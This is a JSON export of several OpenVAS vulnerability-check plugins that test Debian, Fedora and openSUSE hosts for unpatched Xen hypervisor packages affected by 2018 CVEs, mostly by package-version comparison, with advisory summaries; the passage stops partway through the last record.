{"openvas": [{"lastseen": "2019-07-04T18:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.", "modified": "2019-07-04T00:00:00", "published": "2018-05-15T00:00:00", "id": "OPENVAS:1361412562310704201", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704201", "type": "openvas", "title": "Debian Security Advisory DSA 4201-1 (xen - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4201-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704201\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian Security Advisory DSA 4201-1 (xen - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-15 00:00:00 +0200 (Tue, 15 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4201.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_xref(name:\"URL\", 
value:\"https://security-tracker.debian.org/tracker/xen\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor:\n\nCVE-2018-8897\nAndy Lutomirski and Nick Peterson discovered that incorrect handling\nof debug exceptions could result in privilege escalation.\n\nCVE-2018-10471\nAn error was discovered in the mitigations against Meltdown which\ncould result in denial of service.\n\nCVE-2018-10472\nAnthony Perard discovered that incorrect parsing of CDROM images\ncan result in information disclosure.\n\nCVE-2018-10981\nJan Beulich discovered that malformed device models could result\nin denial of service.\n\nCVE-2018-10982\nRoger Pau Monne discovered that incorrect handling of high precision\nevent timers could result in denial of service and potentially\nprivilege escalation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\n# nb: Note that the initial DSA-4201-1 is stating that \"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\" is fixing this which is currently wrong.\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.8\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.8-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.8\", 
ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.8.3+xsa262+shim4.10.0+comet3-1+deb9u6\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-16T00:00:00", "id": "OPENVAS:1361412562310874540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874540", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-a7ac26523d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a7ac26523d_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-a7ac26523d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874540\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-16 06:05:11 +0200 (Wed, 16 May 2018)\");\n script_cve_id(\"CVE-2018-8897\", \"CVE-2018-10472\", \"CVE-2018-10471\", \"CVE-2018-10982\",\n \"CVE-2018-10981\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-a7ac26523d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a7ac26523d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TSWYUDN5DYYW6RZXFYCOECLV6F26JJRM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-05-27T00:00:00", "id": "OPENVAS:1361412562310874611", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874611", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-5521156807", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_5521156807_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-5521156807\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874611\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-27 05:52:53 +0200 (Sun, 27 May 2018)\");\n script_cve_id(\"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\",\n \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-5521156807\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-5521156807\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C7X7HOMV5LPDSELNUPIPYQTIPFBGJEJQ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~3.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-3665", "CVE-2018-8897", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-30T00:00:00", "id": "OPENVAS:1361412562310874755", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874755", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-d3cb6f113c", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d3cb6f113c_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-d3cb6f113c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874755\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-30 06:02:58 +0200 (Sat, 30 Jun 2018)\");\n script_cve_id(\"CVE-2018-3665\", \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\",\n \"CVE-2018-10981\", \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-d3cb6f113c\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d3cb6f113c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ALMLZ3SKTV3RRHYNXOE5J7YVGWZZ2O4C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~4.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:10:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-8897", "CVE-2018-10982"], "description": "Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.", "modified": "2020-01-29T00:00:00", "published": "2018-05-28T00:00:00", "id": "OPENVAS:1361412562310891383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891383", "type": "openvas", "title": "Debian LTS: Security Advisory for xen (DLA-1383-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891383\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-8897\");\n script_name(\"Debian LTS: Security Advisory for xen (DLA-1383-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-28 00:00:00 +0200 (Mon, 28 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/05/msg00015.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"xen on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.1.6.lts1-14.\n\nWe recommend that you upgrade your xen packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in the Xen hypervisor, which\ncould result in denial of service, information leaks or privilege\nescalation.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxen-ocaml-dev\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libxenstore3.0\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-docs-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-hypervisor-4.1-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-amd64\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-system-i386\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-4.1\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xen-utils-common\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"xenstore-utils\", ver:\"4.1.6.lts1-14\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472", "CVE-2018-10981", "CVE-2018-12892", "CVE-2018-12893", "CVE-2018-3665", "CVE-2018-8897", "CVE-2018-10982", 
"CVE-2018-12891", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-07-05T00:00:00", "id": "OPENVAS:1361412562310874763", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874763", "type": "openvas", "title": "Fedora Update for xen FEDORA-2018-a7862a75f5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a7862a75f5_xen_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for xen FEDORA-2018-a7862a75f5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874763\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-05 06:11:55 +0200 (Thu, 05 Jul 2018)\");\n script_cve_id(\"CVE-2018-12891\", \"CVE-2018-12893\", \"CVE-2018-12892\", \"CVE-2018-3665\",\n \"CVE-2018-3639\", \"CVE-2018-8897\", \"CVE-2018-10982\", \"CVE-2018-10981\",\n \"CVE-2018-10472\", \"CVE-2018-10471\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for xen FEDORA-2018-a7862a75f5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"xen on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a7862a75f5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AMJHHOEWJUENZ5JJ3RBMCVUWTYYF4GDE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.10.1~5.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-04T16:46:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10981", "CVE-2018-10982", "CVE-2018-3639"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-06-02T00:00:00", "id": "OPENVAS:1361412562310851773", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851773", "type": "openvas", "title": "openSUSE: Security Advisory for xen (openSUSE-SU-2018:1487-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851773\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:49:52 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-10981\", \"CVE-2018-10982\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for xen (openSUSE-SU-2018:1487-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for xen fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2018-3639: Spectre V4 - Speculative Store Bypass aka 'Memory\n Disambiguation' (bsc#1092631)\n\n This feature can be controlled by the 'ssbd=on/off' commandline flag for\n the XEN hypervisor.\n\n - CVE-2018-10982: x86 vHPET interrupt injection errors (XSA-261\n bsc#1090822)\n\n - CVE-2018-10981: qemu may drive Xen into unbounded loop (XSA-262\n bsc#1090823)\n\n Other bugfixes:\n\n - Upstream patches from Jan (bsc#1027519)\n\n - additional fixes related to Page Table Isolation (XPTI). 
